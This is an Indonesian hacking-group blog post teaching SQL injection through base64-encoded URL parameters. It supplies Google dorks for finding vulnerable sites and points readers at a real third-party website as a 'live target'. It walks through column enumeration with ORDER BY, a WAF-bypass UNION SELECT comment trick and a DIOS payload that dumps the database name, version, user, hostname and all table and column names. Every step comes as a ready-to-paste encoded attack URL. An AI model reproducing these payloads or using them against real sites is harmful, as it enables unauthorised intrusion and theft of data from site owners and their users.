Halo sobat GhostCodersTeam gw isnan kali ini gw akan mengajarkan kalian Cara melakukan Sql injection base64 sebelumnya gw udh menjelaskan Pengertian dari Sqli bagi yg blom mengerti silahkan cari pengertiannya di google ok disini untuk melakukan sql injection base64 kita memerlukan alat encode/decode nya disini ada 2 alat yaitu: aplikasi yg bernama "Codec" bisa kalian unduh di play store dan yg ke 2 yaitu tools encode/decode kalian klik saja Disini nah kalian pilih saja Seterah kalian klo gw lebih baik menggunakan aplikasi Codec ok tanpa basa basi kita lgsung saja ke tutorial nya aja 


Bahan²

-Dork? 

inurl:/php?id=Mg==

inurl:/php?id=Nw==

(Kembangin sendiri) 


-mls ngedork? Tenang gw udh sediakan live target bisa kalian Klik disini


-Aplikasi Codec{bisa kalian unduh di play store} 


-Atau tools bisa kalian Klik disini


-Dios kalian 


-Internet/kuota 


Tutorial:


- kalian klik saja live target nya


-kira² tampilannya seperti itu jika sudah kita pergi ke aplikasi Codec atau tools nya disini gw memakai aplikasi Codec


-Selanjutnya kita ubah method ascii menjadi base 64



-Kita klik saja yg gw garisin lalu kita ubah menjadi base64


-Nah kira² seperti itu


-Jika sudah kita ketik "Mg==" di kotak bawah untuk mengetahui angka parameter nya


-Nah disitu sudah muncul angka param nya yaitu angka 2


-Lalu langkah selanjutnya kita memeriksa web vuln atau tidak nya cara nya? Kita klik saja tanda petik di belakang angka 2 atau parameter nya


-Jika sudah kita Salin saja dan menjadi "http://knotsolutions.com/case_study_view.php?id=Mic=" 


- Bisa kalian lihat di situ web nya vuln ok langkah selanjutnya kita ke order by nya kita ke Codec terlebih dahulu 


-Nah kira hasil encode nya seperti ini: "http://knotsolutions.com/case_study_view.php?id=MiBvcmRlciBieSAxLS0gLQ==" setelah itu kalian Salin lalu pergi ke chrome 


-Bisa kalian liat disitu web nya blom eror maka angka nya kita lanjutkan sampai web nya eror


http://knotsolutions.com/case_study_view.php?id=2 order by 2-- - 

Encode

http://knotsolutions.com/case_study_view.php?id=MiBvcmRlciBieSAyLS0gLQ== 

(oke masih normal) 


http://knotsolutions.com/case_study_view.php?id=2 order by 3-- -

Encode:

http://knotsolutions.com/case_study_view.php?id=MiBvcmRlciBieSAzLS0gLQ==

(Masih normal) 


http://knotsolutions.com/case_study_view.php?id=2 order by 4-- -

Encode:

http://knotsolutions.com/case_study_view.php?id=MiBvcmRlciBieSA0LS0gLQ==

(eror) 


-Bisa kalian liat disitu web nya eror di angka 4 lalu selanjutnya mencari angka toghel nya dan kita encode lgi 



Maka hasil nya "http://knotsolutions.com/case_study_view.php?id=LTIgb3JkZXIgYnkgMSwyLDMtLSAt" lalu kita Salin kembali dan lanjut ke chrome 


-Bisa kalian liat disitu angka toghel nya tidak muncul maka kita akan menggunakan waff bypass yaitu ( /**//*!12345UNION SELECT*//**/ ) itu dia bypass nya gw kurungin lalu kita encode saja


Maka hasil nya encode nya:
http://knotsolutions.com/case_study_view.php?id=LTIgLyoqLy8qITEyMzQ1VU5JT04gU0VMRUNUKi8vKiovIDEsMiwzLS0gLQ== 

-Nah kita Salin lalu kita ke chrome


-Nah bisa kalian liat disitu angka toghel nya yaitu angka 2 dan 3 kalian pilih saja salah satunya lalu kalian hapus angka nya dan ganti dengan dios kalian disini gw hapus angka 3 dan gw ganti angka 3 menjadi dios yg gw gunakan 

Dios yg gw gunakan yaitu:
concat_ws('<br>','Xnanz',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database())))

-Nah itu adalah dios yg gw gunakan lalu kita encode lgi 


Maka hasil nya
http://knotsolutions.com/case_study_view.php?id=LTIgLyoqLy8qITEyMzQ1VU5JT04gU0VMRUNUKi8vKiovIDEsMixjb25jYXRfd3MoJzxicj4nLCdYbmFueicsZGF0YWJhc2UoKSx2ZXJzaW9uKCksdXNlcigpLEBAaG9zdG5hbWUsKHNlbGVjdChncm91cF9jb25jYXQoJzxicj4nLHRhYmxlX25hbWUsJzonLGNvbHVtbl9uYW1lKSlmcm9tKGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zKXdoZXJlKHRhYmxlX1NjaGVtYT1kYXRhYmFzZSgpKSkpLS0gLQ==

Lalu kita Salin dan pergi ke chrome 

Ok berhasil 


Next time nya kawan hehe

Masih blom mengerti atau ada pertanyaan lain silahkan hubungi kami di Gmail kami

Contact person:
ghostcodersteam@gmail.com 



1 Komentar

Xss mengatakan…
Mantapppppp